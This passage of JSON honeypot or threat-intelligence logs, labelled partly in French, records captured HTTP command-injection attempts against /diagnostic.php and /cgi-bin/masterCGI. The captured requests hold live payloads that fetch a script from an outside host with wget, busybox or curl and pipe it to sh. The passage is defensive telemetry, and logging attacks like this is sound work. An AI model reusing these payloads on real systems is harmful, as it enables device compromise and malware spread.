\u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00222961d8ee7cf90ce454fc140171822257\u0022, \u0022path_pattern_hash\u0022: \u0022918c7cd9de3921c3a9cf2fd44c04b514\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/diagnostic.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Length: 218\\r\\nConnection: close\\r\\n\\r\\nact=ping\u0026dst=%26%20cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusybo\u0022, \u0022payload_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/diagnostic.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Length: 218\\r\\nConnection: close\\r\\n\\r\\nact=ping\u0026dst=%26%20cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusybo\u0022, \u0022payload_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221228ebc6e34979b206589d18efe2aeee381ce464\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/diagnostic.php\u0022, \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/diagnostic.php\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/diagnostic.php\u0022, \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/diagnostic.php\u0022, \u0022evidence_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":376},{"id":11860763,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59856,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":47,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 2, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022daeda2ae79a1c94f294763a7a4e3a3b7695e64a6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 296, \u0022payload_entropy\u0022: 5.189352824972811, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00222775ead4644e4c408f5c3d71989c0848800063f4\u0022, \u0022event_fingerprint\u0022: \u00228537d43b72af988be847ecd822c895b4a9f53003\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002242fd74851afc42c87adebee806f4b184\u0022, \u0022path_pattern_hash\u0022: \u00229dbe1efebb97f3b2ef3472eff039ee1f\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022query_string\u0022: \u0022ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022query_string\u0022: \u0022ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\\r\\nHo\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00224ab523e2a9d2976d7620ba560f2700a27aaa4719\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20al\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20al\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, 